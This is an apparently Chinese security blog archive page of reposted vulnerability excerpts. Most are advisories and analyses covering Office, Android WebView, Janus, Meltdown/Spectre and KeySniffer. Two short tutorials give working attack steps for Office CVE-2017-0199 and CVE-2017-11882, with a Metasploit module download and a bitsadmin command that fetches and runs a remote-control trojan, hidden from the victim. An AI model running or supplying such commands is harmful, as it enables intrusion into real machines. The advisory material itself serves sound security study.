分类目录归档:漏洞攻击
Windows系统中的图形设备接口漏洞[转]
https://nosec.org/home/detail/4357.html
近期,微软公开了Windows图形设备接口(Graphics Device Interface)中的远程代码执行(RCE)漏洞。0patch平台(着重打造微软平台补丁,有时比官方还快)已针对Windows 7和Server 2008 R2平台的用户发布了修复补丁。
该补丁适用于那些未能注册微软的扩展安全更新服务(ESU)的0Patch(Windows 7或Server 2008 …
CVE-2018-0758 字符串连接整数溢出导致堆溢出【转】
漏洞触发
…let a = ”;
let b = ‘A’.repeat(0x10000);
for
2018年微软修复的首个Office 0day漏洞(CVE-2018-0802)分析【转】
简介
2018年1月的微软安全补丁中修复了360核心安全高级威胁应对团队捕获的office 0day漏洞(CVE-2018-0802),该漏洞几乎影响微软目前所支持的所有office版本。这是继360在全球范围内首家截获Office 0day漏洞(CVE-2017-11826)在野攻击以来,发现的第二起利用零日漏洞的在野高级威胁攻击。360核心安全团队一直与微软保持积极沟通,一起推进该0day漏洞的修复,让漏洞得到妥善解决后再披露漏洞信息。该漏洞的技术原理类似于潜伏了17年的“噩梦公式”漏洞(CVE-2017-11882),是黑客利用office内嵌的公式编辑器EQNEDT32.EXE再次发起的攻击,我们将其命名为“噩梦公式二代”(CVE-2018-0802)。
攻击流程分析
我们捕获了多个“噩梦公式二代”的在野攻击,在野样本嵌入了利用Nday漏洞和0day漏洞的2个公式对象同时进行攻击,Nday漏洞可以攻击未打补丁的系统,0day漏洞则攻击全补丁系统,绕过了CVE-2017-11882补丁的ASLR(地址随机化)安全保护措施,攻击最终将在用户电脑中植入恶意的远程控制程序。
图:“噩梦公式二代”在野样本攻击流程
漏洞细节分析
…关于Android平台WebView控件存在跨域访问高危漏洞的安全公告【转】
安全公告编号:CNTA-2018-0005
2017年12月7日,国家信息安全漏洞共享平台(CNVD)接收到腾讯玄武实验室报送的Android WebView存在跨域访问漏洞(CNVD-2017-36682)。攻击者利用该漏洞,可远程获取用户隐私数据(包括手机应用数据、照片、文档等敏感信息),还可窃取用户登录凭证,在受害者毫无察觉的情况下实现对APP用户账户的完全控制。由于该组件广泛应用于Android平台,导致大量APP受影响,构成较为严重的攻击威胁。
一、漏洞情况分析
WebView是Android用于显示网页的控件,是一个基于Webkit引擎、展现web页面的控件。WebView控件功能除了具有一般View的属性和设置外,还可对URL请求、页面加载、渲染、页面交互进行处理。
该漏洞产生的原因是在Android应用中,WebView开启了file域访问,且允许file域对http域进行访问,同时未对file域的路径进行严格限制所致。攻击者通过URL Scheme的方式,可远程打开并加载恶意HTML文件,远程获取APP中包括用户登录凭证在内的所有本地敏感数据。
漏洞触发成功前提条件如下:
1.WebView中setAllowFileAccessFromFileURLs 或setAllowUniversalAccessFromFileURLsAPI配置为true;…
CPU特性漏洞测试POC(Meltdown and Spectre)【转】
CPU特性漏洞测试POC(Meltdown and Spectre)
…独家分析:安卓“Janus”漏洞的产生原理及利用过程【转】
近日,Google在12月发布的安卓系统安全公告中披露了一个名为“Janus”安卓漏洞(漏洞编号:CVE-2017-13156)。该漏洞可以让攻击者绕过安卓系统的signature scheme V1签名机制,进而直接对App进行篡改。而且由于安卓系统的其他安全机制也是建立在签名和校验基础之上,该漏洞相当于绕过了安卓系统的整个安全机制。
在第一时间监测到“janus”漏洞的情况后,顶象技术及时更新了“安全SDK”的防御策略,并率先发布了针对该漏洞的防护方案,以帮助广大用户防范基于该漏洞的攻击威胁。
分析显示,安卓5.0到8.0系统以及基于signature scheme V1签名机制的App均受“Janus”漏洞影响;基于signature …
CVE-2017-0199利用【转】
大家好,我是Alex。今天教大家简单复现一个office漏洞CVE-2017-0199
下载漏洞利用脚本
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat,然后打开msf生成hta文件链接
然后使用刚才下载的exp设置参数
Run后复制文件到靶机测试
查看回话
…
CVE-2017-11882利用大全【转】
大家好,我是Alex。今天教大家有效利用OFFICE这个漏洞!首先使用HTA脚本远程下载和执行远控马~
新建一个HTA脚本
bitsadmin /transfer officehttp://192.168.1.19:81/office.exe c:\office.exe & c:\office.exe
PS:加入/setpriority来提高任务的优先级(加速),加入vbhide来隐藏下图那恼人的窗口
上传到web目录或者使用其他工具建立下载链接…
大量无线键盘存在KeySniffer漏洞,可嗅探用户输入【转】
几美元的一根天线、一个无线发射器,还有几行Python代码,有了这些,黑客就可以在几十米开外主动地记录下你的用户名、密码、信用卡、你写的稿子,总之就是你用无线键盘输入的任何东西。
黑客所利用的是一种无线键盘漏洞,这种漏洞无法轻易防范,而且很难想到。来自Bastille安全公司的研究人员率先发现了这一漏洞,并把它命名为KeySniffer。
影响设备
研究人员对12款来自知名厂商的键盘进行了测试,发现其中8款能被窃听,但是实际上这个列表还远不及真正存在漏洞的数量。这个漏洞波及的范围实在太大,研究人员相信有大量的设备存在漏洞。
与此同时,厂商的态度也令人失望。Bastille首席研究官Ivan O’Sullivan称,“大部分的厂商还没有回应我们披露的信息。”
演示视频
升级版的MouseJack
GNU tar 解压路径绕过漏洞(CVE-2016-6321) 分析【转】
Author: LG(知道创宇404安全实验室) Date: 2016-11-09
0x00 漏洞概述
1.漏洞简介
GNU tar文档管理命令是Linux系统下常用的一个打包、压缩的命令。经